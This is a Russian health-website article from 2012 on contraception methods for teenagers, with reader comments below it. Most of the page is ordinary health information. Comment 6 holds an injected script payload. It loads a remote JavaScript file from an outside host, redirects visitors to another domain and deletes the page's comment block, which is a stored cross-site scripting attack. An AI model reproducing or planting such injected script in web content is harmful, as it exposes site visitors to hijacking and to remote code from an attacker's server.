Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Контрацепция в юном возра...  >>  Контрацепция в юном возрасте
 
Обратная связь
 

Контрацепция в юном возрасте

Размер шрифта
26 апреля 2012 09:30
  • google_analytics: false
  • Нравится

Половое созревание современных девушек происходит раньше, чем в предыдущих поколениях. Однако недостаточная психическая зрелость и безответственность приводят к тому, что довольно часто юные девушки не умеют предохраняться.

Контрацепция в подростковом возрасте преследует две главные цели – предотвратить нежелательную беременность и аборт и заражение заболеваниями, передающимися половым путем.

Методы контрацепции, оптимальные в юном возрасте

  • Гормональный метод – наиболее надежный способ предотвратить беременность в этом возрасте. Но этот метод не предотвращает появления заболеваний, передающимися половым путем.

Противозачаточные таблетки девушкам можно принимать только при соблюдении следующих условий:

регулярная половая жизнь;

  • наступление первой менструации не менее 2 лет назад;
  • рост не менее 160 см.;
  • отсутствие ожирения;
  • отсутствие серьезных заболевании сердца и сосудов.

Всемирная Организация Здравоохранения (ВОЗ) рекомендует подросткам комбинированные противозачаточные таблетки. Они обеспечивают наименьшее вмешательство в естественное течение процессов, происходящих в женском организме, и сохраняют стабильность менструального цикла.

Экстренная контрацепция – чрезвычайная мера предохранения от нежелательной беременности, хотя и предпочтительнее аборта, после близости с разрывом презерватива при его использовании или при незащищенном половом контакте.

В России часто используют Постинор, содержащий 0,75 мг левоноргестрела, однако ВОЗ не рекомендует его к применению, т.к. его контрацептивная эффективность невысока и часто возникают побочные эффекты.

  • Введение внутриматочных средств производят в течение 5-7 дней после незащищенного полового контакта.

В качестве средства неотложной контрацепции этот метод имеет право на существование, но девочкам-подросткам его лучше не применять, потому что высок риск воспаления матки и ее придатков.

  • Использование барьерных методов контрацепции снижает риск возникновения заболеваний, передающихся половым путем, более чем в 2-3 раза, особенно при использовании презерватива.

Однако контрацептивная эффективность презерватива у молодых людей из-за неправильного использования непосредственно в момент полового акта невысока и составляет 50-75%.

  • Возможно одновременное использование презерватива и спермицидов (пасты, кремы, гели и др.), что повышает эффективность применения барьерных методов контрацепции.

Применение только спермицидных средств в подростковом возрасте нецелесообразно, так как их контрацептивный эффект невысок.

В связи с распространением СПИДа и других заболеваний, передающихся половым путем, подросткам рекомендуется комбинировать контрацептивные методы, например сочетать использование презерватива и спермицидов или прием противозачаточных таблеток с использованием презервативов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

09 апреля 2014 в 21:56

Цитировать   |   Пожаловаться


2 - Гость

18 августа 2014 в 22:13

Комментарий удален за нарушение Правил общения

3 - Гость

05 мая 2015 в 15:04

Цитировать   |   Пожаловаться

Я давно уже остановилась на свечах, не гормональное и надежное средство, никаких побочных действий или неприятных ощущений они не вызывают.

4 - Гость

10 мая 2015 в 21:25

Комментарий удален за нарушение Правил общения

5 - Гость

14 июня 2015 в 14:06

Комментарий удален за нарушение Правил общения

6 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

7 - Гость

17 ноября 2015 в 14:42

Цитировать   |   Пожаловаться

В юном возрасте или с партнером в котором не уверены лучше всего, конечно, пользоваться презервативами, для семейных пар уже можно выбрать другой способ контрацепции, мы с мужем свечами пользуемся.

8 - Гость

31 октября 2016 в 21:21

Цитировать   |   Пожаловаться

Гость 05 мая 2015 в 15:04
Я давно уже остановилась на свечах, не гормональное и надежное средство, никаких побочных действий или неприятных ощущений они не вызывают.                     

Я бы тоже перешла на свечи, но только совсем не знаю какие лучше выбрать, мне главное, чтобы были надежными.

Статьи

       
Вся правда об экстренной контрацепции   Почему женщины занимаются сексом   Мужская гормональная контрацепция   Как защитить ребенка от педофилов  
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 
18 сентября 2012Нет презерватива? Будет рак простаты! 10 июля 2012Гормон, отвечающий за материнские чувства, способен бороться с лишним весом
 

Слайдшоу

1
Может ли секс с презервативом приносить удовольствие?!
Мифы о сексе после 40
Методы контрацепции

Тесты

Как подобрать контрацептивы?
Насколько у вас велик риск заболеть ВИЧ?
Здорова ли ваша предстательная железа
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.